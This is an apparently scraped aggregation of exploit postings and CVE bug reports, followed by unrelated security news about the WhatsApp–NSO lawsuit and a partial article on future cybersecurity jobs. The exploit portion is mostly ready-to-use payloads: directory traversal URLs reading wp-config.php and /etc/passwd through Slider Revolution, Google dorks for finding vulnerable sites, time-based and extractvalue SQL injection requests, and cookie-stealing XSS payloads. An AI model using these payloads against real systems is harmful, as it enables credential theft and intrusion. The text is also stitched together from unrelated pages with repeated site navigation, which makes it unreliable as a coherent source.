WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.3 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 83b023ff748b63a814933d6674398e32e4fb2ba5c520cc7997e01b2a23da875c

Download | Favorite | View

**WordPress Slider Revolution 4.1.3 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.3 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/sse.sg/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.3 Directory Traversal

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108

Download | Favorite | View

**WordPress Slider Revolution 4.1.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.2 Directory Traversal

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 3.0.8 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53

Download | Favorite | View

**WordPress Slider Revolution 3.0.8 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 3.0.8 Directory Traversal

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

**WordPress Profile Builder 3.0.5 SQL Injection**

Posted Jan 13, 2023

Authored by indoushka

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | dd2a00364eee556c9e3981aef19bd8de262365e971b4b9c66b65ec44ec825637

Download | Favorite | View

**WordPress Profile Builder 3.0.5 SQL Injection**

    ====================================================================================================================================| # Title     : WordPress profile builder 3.0.5 SQL Injection Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://fr.wordpress.org/plugins/profile-builder/                                                                  |  | # Dork      : "  "                                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Profile Builder 3.0.5 SQL Injection

Online Student Enrollment System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /student_enrollment/admin/login.php.

**Online Student Enrollment System v1.0 by donbermoy has SQL injection**

BUG\_Author:XueYing Li

vendors:https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html

Vulnerability File: /student\_enrollment/admin/login.php

Parameter "username" (POST), exists SQL injection vulnerability

Payload1:username=1%27&password=2&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/student_enrollment/admin/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=bi7132qp84261ga80u4umo124d
    Connection: close
    
    username=1%27&password=2&login=
    

An error page

Payload2:username=1%27%27&password=2&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Content-Length: 34
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/student_enrollment/admin/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=bi7132qp84261ga80u4umo124d
    Connection: close
    
    username=1%27%27&password=2&login=
    

An right page

Payload3:username=a'%2b(select\*from(select(sleep(20)))a)%2b'&password=b&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=argh74f67q09vjd4k7088q9sji
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/student_enrollment/admin/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 69
    
    username=a'%2b(select*from(select(sleep(20)))a)%2b'&password=b&login=
    

sleep(20) The server response time is 20 seconds

CVE-2022-46502: bug_report/SQLi-1.md at main · snowingllll/bug_report

Online Health Care System v1.0 was discovered to contain a SQL injection vulnerability via the consulting_id parameter at /healthcare/Admin/consulting_detail.php.

Permalink

**Online Health Care System v1.0 by janobe has SQL injection**

BUG\_Author: Peisen Wang

vendors:https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html

Vulnerability File: /healthcare/Admin/consulting\_detail.php

Parameter "consulting\_id" (GET), exists delayed injection vulnerability

Payload1: /healthcare/Admin/consulting\_detail.php?consulting\_id=(select\*from(select(sleep(10)))a)

    GET /healthcare/Admin/consulting_detail.php?consulting_id=(select*from(select(sleep(10)))a) HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

select(sleep(10)), The server response time is 10 seconds

Payload2: /healthcare/Admin/consulting\_detail.php?consulting\_id=(select\*from(select(sleep(20)))a)

    GET /healthcare/Admin/consulting_detail.php?consulting_id=(select*from(select(sleep(20)))a) HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

select(sleep(20)), The server response time is 20 seconds

CVE-2022-46471: bug_report/SQLi-1.md at main · dreamwonly/bug_report

A vulnerability classified as critical was found in TuziCMS 2.0.6. This vulnerability affects the function delall of the file \App\Manage\Controller\KefuController.class.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218152.

line: 157 - 196  
\` public function delall(){  
//dump($\_POST);  
//exit;  
$m=D('Advert'); //数据库表，配置文件中定义了表前缀，这里则不需要写  
$id = I('post.id');  
//dump($id);  
//exit;  
if ($id==null){  
$this->error('请选择删除项！');  
}  
//判断id是数组还是一个数值  
if(is\_array($id)){  
$where = 'id in('.implode(',',$id).')';  
//implode() 函数返回一个由数组元素组合成的字符串  
}else{  
$where = 'id='.$id;  
}  
//dump($where);  
//exit;

    	$m=M('Advert');
    	$arr=$m->where($where)->select();
    	
    	foreach ($arr as $key => $value){
    		$images=$value['advert_image'];
    		//dump($images);
    		//exit;
    		unlink('./Uploads/'.$images);
    	}
    	
    	$count=$m->where($where)->delete(); //修改表单用save函数
    	if ($count>0){
    		$this->success("成功删除{$count}条！");
    	}
    	else {
    		$this->error('批量删除失败！');
    	}
    
    }
    `
    

Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.

  

poc:  
\`POST /index.php/manage/kefu/delall HTTP/1.1  
Host: www.tuzi.com  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2  
x-forwarded-for: 8.8.8.8  
x-originating-ip: 8.8.8.8  
x-remote-ip: 8.8.8.8  
x-remote-addr: 8.8.8.8  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 73

id=1/**/and/**/(extractvalue(1,concat(0x7e,(select/\*\*/user()),0x7e)))

\`

CVE-2023-0244: \App\Manage\Controller\KefuController.class.php has SQLinject · Issue #13 · yeyinshi/tuzicms

A cross-site scripting (XSS) vulnerability in the component /admin/register.php of Online Student Enrollment System v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter.

Permalink

Cannot retrieve contributors at this time

**Online Student Enrollment System v1.0 by donbermoy has Cross-site scripting**

BUG\_Author: mkwsj007

vendors:https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html

Vulnerability File: /student\_enrollment/admin/register.php

POST parameter 'name' exists Cross-site scripting vulnerability

Payload1: a"><script>alert(1)</script>b

    POST /student_enrollment/admin/register.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 797
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMkbv5jtnvqBtc9PG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/student_enrollment/admin/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=j9loi161fde5rq6oo1jkuelrcn
    Connection: close
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="name"
    
    a"><script>alert(1)</script>b
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="email"
    
    c@gmail.com
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="username"
    
    d
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="password"
    
    e
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="c_password"
    
    e
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="photo"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="register"
    
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG--
    

Payload2: a"><script>alert(document.cookie)</script>b

    POST /student_enrollment/admin/register.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 811
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryo4AaLx6Ali4mxyDj
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/student_enrollment/admin/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=j9loi161fde5rq6oo1jkuelrcn
    Connection: close
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="name"
    
    a"><script>alert(document.cookie)</script>b
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="email"
    
    c@gmail.com
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="username"
    
    d
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="password"
    
    e
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="c_password"
    
    e
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="photo"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="register"
    
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj--

CVE-2022-46503: bug_report/XSS-1.md at main · mkwsj007/bug_report

Categories: News
Tags: Pegasus

Tags:  spyware

Tags:  Pegasus spyware

Tags:  NSO Group

Tags:  NSO

Tags:  Apple

Tags:  WhatsApp

Tags:  Meta

Tags:  Foreign Sovereign Immunity Act

The US Supreme Court essentially gave Meta’s WhatsApp the go ahead to pursue their case against Pegasus’s NSO Group.



(Read more...)




The post WhatsApp lawsuit against NSO Group greenlit by Supreme Court  appeared first on Malwarebytes Labs.

On Monday, the US Supreme Court denied the NSO Group's petition for a _writ of certiorari_, a request to the high court to review its case, signaling that Meta's WhatsApp can go ahead with its case against the Israeli-based company behind the Pegasus spyware. The court didn't explain why it refused to hear the NSO's appeal.

If you recall, WhatsApp filed a lawsuit against NSO in 2019 under the Computer Fraud and Abuse Act for allegedly targeting and installing spyware on roughly 1,400 devices of its global users, including human rights activists, journalists, and government officials.

NSO group allegedly did this by exploiting a then zero-day vulnerability in WhatsAapp. Based on a detailed timeline of the case, NSO said it is protected by the Foreign Sovereign Immunity Act (FSIA), which shields foreign government officials from common law, making it immune to the lawsuit—an argument district court judges in California were unconvinced by.

The company then filed a motion to dismiss the case in the US Court of Appeals, insisting it should be granted immunity, much to the dismay of a number of organizations: Microsoft, Google, Cisco, GitHub, LinkedIn, VMWare, and Internet Association (IA). These companies then banded together to file an amicus brief supporting WhatsApp's case.

Microsoft said:

> “We believe the NSO Group's business model is dangerous and that such immunity would enable it and other PSOAs to continue their dangerous business without legal rules, responsibilities or repercussions. The expansion of sovereign immunity that NSO seeks would further encourage the burgeoning cyber-surveillance industry to develop, sell and use tools to exploit vulnerabilities in violation of US law. Private companies should remain subject to liability when they use their cyber-surveillance tools to break the law, or knowingly permit their use for such purposes, regardless of who their customers are or what they’re trying to achieve."

Eventually, the Appeals Court rejected NSO's appeal.

Appeals Court judge Danielle Forrest wrote in a unanimous opinion:

> "NSO does not contend that it meets the FSIA’s definition of 'foreign state,' and, of course, it cannot. It is not itself a sovereign. NSO is a private corporation that provides products and services to sovereigns — several of them," 
> 
> "Whatever NSO's government customers do with its technology and services does not render NSO an 'agency or instrumentality of a foreign state,' as Congress has defined that term. Thus, NSO is not entitled to the protection of foreign sovereign immunity."

The NSO Group's request for the Supreme Court to review its case was its last straw effort to be recognized as a foreign government agent and is, therefore, entitled to sovereign immunity.

In a statement to Reuters, WhatsApp spokesperson Carl Woog is quoted saying:

> "NSO's spyware has enabled cyberattacks targeting human rights activists, journalists and government officials. We firmly believe that their operations violate US law and they must be held to account for their unlawful operations."

Meta's WhatsApp is not the only tech giant suing the NSO Group. Apple also filed a lawsuit against the Israeli firm in November 2021 for violating terms of service by hacking into the devices of Apple users, calling the company "amoral 21st-century mercenaries."

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

WhatsApp lawsuit against NSO Group greenlit by Supreme Court 

With artificial intelligence poised to displace many SOC professionals, it's important to think ahead to potential niches for cybersmart humans — even to outer space.

As routine work is increasingly performed by automated systems, exciting new jobs are likely to emerge in cybersecurity. Positions in outer space cybersecurity, AI mentoring, and digital footprint consulting may sound unusual at first glance, but the rapid development of technology could make them a reality in just a few years. Let's take a look at a few of the possibilities.

**Outer Space Cybersecurity Engineer**

Satellites are one of the most essential pieces of space technology in daily life, used in navigation systems, broadcast media, and other communications. The more we use technologies that rely on satellites, the more attractive a target this type of space-based infrastructure becomes to threat actors.

Satellites and the space industry as a whole require dedicated specialists who can prevent attacks of all kinds. This is particularly true when securing systems such as navigation, engine control, emergency, and communication infrastructure. With the development of space tourism, asteroid mining, and new space stations, there will be rising demand for out-of-earth cybersecurity experts.

